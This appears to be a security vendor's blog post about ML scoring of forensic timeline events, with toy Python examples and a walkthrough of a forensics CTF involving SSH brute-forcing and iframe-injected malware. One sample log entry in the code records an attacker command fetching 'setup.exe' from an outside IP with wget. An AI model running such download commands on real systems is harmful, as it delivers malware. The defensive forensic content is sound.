Augmenting, Not Automating, SOC Analysts with Machine Learning
As businesses and organizations around the world continue to adopt cloud at a growing rate, cyber actors have moved to exploit the opportunity this creates. These trends have increased both the scale and complexity of cyberattacks, and the challenges facing the Security Operations Centre (SOC) keep mounting. Faced with a growing volume of security alerts to investigate, and the need to act quickly and decisively, something has to change.
At Cado Security, we’ve decided to invest in Machine Learning (ML) technology to help you meet these challenges. Building on our extensive use of automation, these new ML capabilities will help you in two key ways. First, by presenting the most pertinent contextualized information, they will enable your SOC analysts to make accurate and rapid decisions while triaging the overwhelming number of security alerts they see every day. Second, they will enrich your forensic datasets and help you delve deeply into them during more complex security investigations.
Your analysts are, and will always be, critical to the success of the SOC. However, in this day and age their responsibilities are incredibly challenging and are only getting more so. We believe that through the judicious use of ML, their expertise can be augmented, leading to faster and more accurate decision making.
Introducing Cado’s ML Augmented Investigations
The Cado Security platform offers unparalleled depth of data to support security operations, investigations, and incident response. That depth presents its own challenge, however: there is simply too much data to reasonably expect anyone to look at it all. Tools and techniques are essential to help you make sense of it.
We have enhanced the platform's underlying algorithms to help you prioritize what to look at, both in the context of automated workflows and during manual investigations. We’ll save the technical details for another blog post, but briefly, we have augmented the forensic timeline by adding a “score” to every event. This scoring system was built using contemporary machine learning approaches, data from real world cyber compromises, and the knowledge and experience of our expert incident response/forensics practitioners at Cado Security.
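We’ll keep the technical details for that future post, but the general idea can be sketched in a few lines. The snippet below is purely illustrative and is not Cado’s implementation: it assumes a supervised classifier trained on labeled events from past compromises, with made-up feature names, that outputs a probability between 0 and 1 for each new event.

# Illustrative only: a toy supervised scorer for timeline events. Cado's
# production model and feature set are not described here; the features,
# training data, and labels below are hypothetical.
import numpy as np
from sklearn.ensemble import GradientBoostingClassifier

# Hypothetical features per event: [hour_of_day, is_auth_event, bytes_written, is_known_binary]
X_train = np.array([
    [3,  1, 0,     0],   # off-hours SSH login              -> pertinent
    [14, 0, 120,   1],   # routine log rotation             -> benign
    [4,  0, 98000, 0],   # unknown binary written overnight -> pertinent
    [10, 0, 40,    1],   # package manager update           -> benign
])
y_train = np.array([1, 0, 1, 0])  # 1 = pertinent to an incident, 0 = benign noise

model = GradientBoostingClassifier().fit(X_train, y_train)

# predict_proba yields a value in [0, 1] per event, analogous to the
# per-event score surfaced in the Cado timeline.
new_events = np.array([
    [2,  1, 0,  0],
    [11, 0, 60, 1],
])
for event, score in zip(new_events, model.predict_proba(new_events)[:, 1]):
    print(f"event={event.tolist()} score={score:.2f}")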
Where can you see these enhancements?
- AI Investigator, an LLM summary of events within an Investigation
- Automated Investigation, a machine learning model that scores and prioritizes activity across a system
- Timeline Search, the full fire-hose of data that both powers our higher-level capabilities and allows analysts to dive deeper
Let’s briefly explore these features.
First, when opening a new project in the Cado platform, you’ll likely want a high-level view of what has happened. See (1) in the screenshot above. Using our new ML techniques, we shortlist the entire timeline of events down to just the most pertinent information. This timeline shortlist is then summarized into natural language (see a recent blog post for further details) to give you a 10,000-foot view of the project and, ideally, a good idea of what has happened.
Like any automated process, this feature can suffer from the so-called garbage in, garbage out principle. The quality of this human-readable summary is dependent on the quality of the data we feed into it. These new ML capabilities are an intentional investment by Cado Security to improve the quality of this data selection process, and ultimately, your ability to make accurate and rapid triage decisions.
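To make the two-stage design concrete, here is a minimal sketch of a shortlist-then-summarize pipeline. It is not the platform’s actual code: the event fields, the 0.9 threshold, and the prompt wording are assumptions, and the final call out to an LLM is left as a comment.

# Illustrative sketch of a shortlist-then-summarize pipeline; not Cado's actual code.
# The event fields, the 0.9 threshold, and the prompt wording are all hypothetical.

def shortlist(events, threshold=0.9):
    """Keep only events the ML model scored as likely pertinent."""
    return [e for e in events if e["score"] >= threshold]

def build_summary_prompt(events):
    """Turn shortlisted events into a natural-language summarization prompt."""
    lines = [f'{e["timestamp"]} {e["source"]}: {e["message"]}' for e in events]
    return ("Summarize the following forensic timeline events as a short "
            "incident narrative for a SOC analyst:\n" + "\n".join(lines))

timeline = [
    {"timestamp": "2024-01-05T03:12:09Z", "source": "auth.log",
     "message": "Accepted password for root from 203.0.113.7", "score": 0.97},
    {"timestamp": "2024-01-05T03:14:41Z", "source": "bash_history",
     "message": "wget http://203.0.113.7/setup.exe", "score": 0.95},
    {"timestamp": "2024-01-05T09:00:00Z", "source": "syslog",
     "message": "logrotate completed", "score": 0.02},
]

prompt = build_summary_prompt(shortlist(timeline))
print(prompt)  # In the real feature, this prompt would be sent to an LLM.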
Despite our best efforts with the AI Investigator, your analysts will sometimes have remaining questions. The Automated Investigation feature (see (2) in the screenshot above) lets them explore the timeline shortlist described above directly.
Finally, there will be security incidents you face that are inherently more complicated, where deeper analysis and investigation are warranted. In such cases, our timeline search feature (see 3a in the screenshot above) lets you harness the full power of the Cado platform to investigate your forensic captures in depth.
There are two product enhancements to call out here.
You can use our query language to investigate the timeline, and queries can now include clauses on the score described above. See 3b in the screenshot above. Documentation on our query language is available here. As an example, you might want to try the following query:
auto_investigate_score: [0.9 TO 1.0]
This query will show you all events that have a relatively high score, as the possible range is from 0 (almost certainly uninteresting) to 1 (almost certainly interesting).
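If your analysts build triage queries programmatically, the same score clause can be generated for different thresholds. The short sketch below simply constructs query strings in the syntax shown above; the 0.9 and 0.5 cut-offs are arbitrary examples rather than recommended values.

# Build score-range clauses in the timeline query syntax shown above.
# The 0.9 and 0.5 thresholds are arbitrary examples, not recommendations.

def score_clause(lower, upper=1.0):
    """Return a query clause selecting events whose score falls in [lower, upper]."""
    return f"auto_investigate_score: [{lower} TO {upper}]"

print(score_clause(0.9))   # first pass: only the most suspicious events
print(score_clause(0.5))   # widen the net if the first pass turns up nothing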
Additionally, your analysts may prefer to utilize our faceted search capability, which allows them to interactively build a timeline query using our user interface. See 3c in the screenshot above, which gives insight into the distribution of scores across the timeline.
How can I try this out?
While we continue to develop and refine these new capabilities, we have released an initial version under our package of experimental features. This allows you to opt in and test it out if you like, and allows us to gather your feedback from real-world testing. Please let us know what you think.
You will need to enable this in the settings of your Cado platform instance.
Settings -> Experiments -> Next-Gen Automated Investigations
Here is a quick example scenario to help illustrate this new ML-based approach.
You may be familiar with Bob’s Chili Burgers, a forensics Capture the Flag (CTF) problem created by Andrew Swartwood. You can find the original post, which includes the problem description, here.
SPOILER ALERT! Please stop reading here if you want to try this yourself first.
Briefly: Bob, the owner of Bob’s Chili Burgers LLC, runs a website. Bob has started to receive complaints about his website infecting customers with malware.
The attacker has achieved initial access to the web server via an SSH-based password guessing attack, made some changes to the legitimate website (iframe injection to serve some executable malware) and tried to hide evidence of their activity. The attacker has also created a new account and changed some passwords to allow them to maintain persistent access into the future.
Upon importing these forensic artifacts into the Cado platform, we can see that the timeline consists of 226,167 events. Quite a lot to sift through! The Automated Investigation view shows you a small number of events that are more likely to be pertinent to your investigation into this compromise, using our new ML model to select them.
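If you prefer to work with the raw data, for example after exporting the timeline to CSV, the same score can be used to cut the event count down outside the UI. This is a hedged illustration only: the file name and column names below are assumptions, not documented export fields.

# Hypothetical example: filtering an exported timeline CSV by its score column.
# The file name and column names are assumptions, not documented Cado export fields.
import pandas as pd

timeline = pd.read_csv("bobs_chili_burgers_timeline.csv")   # ~226,167 rows in this CTF
high_scoring = timeline[timeline["auto_investigate_score"] >= 0.9]

print(f"{len(timeline)} events reduced to {len(high_scoring)} high-scoring events")
print(high_scoring[["timestamp", "source", "message"]].head())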
Here are some screenshots, truncated for brevity.
In our case, we are left with 28 events (highlighted with a green circle above). Cado Security’s existing content-based alarm system already surfaces much of the exploitation (highlighted in black boxes above):
- Password changes for the root user account
- The iframe injection into the legitimate website, and the malware that it was then made to serve to visitors (setup.exe)
- Suspected timestomping and covering of the attacker’s tracks
- etc.
Our new model adds to this picture, helping you understand quickly what has happened. In this case, it identifies the creation of a new user account that the attacker used for ongoing access (radvlad) and the change of password on Bob’s account. These can be seen highlighted in red boxes.
Future Work
This blog describes our first iteration of ML-augmented analytics in the Cado platform, but it won’t be the last. We look forward to sharing more updates with you as we continue to invest in this technology, helping you understand the full scope of the attacks facing your organization and act with confidence.
We plan to apply a continuous improvement methodology in the following areas:
- Designing new ways to expose the results and recommendations of these ML models to you, enhancing the user experience
- Harnessing the power of these predictive systems within our automated processing systems
- Improving the quality and performance of the underlying ML models to make more accurate predictions
If you have any feedback, or requests, we’d love to hear from you!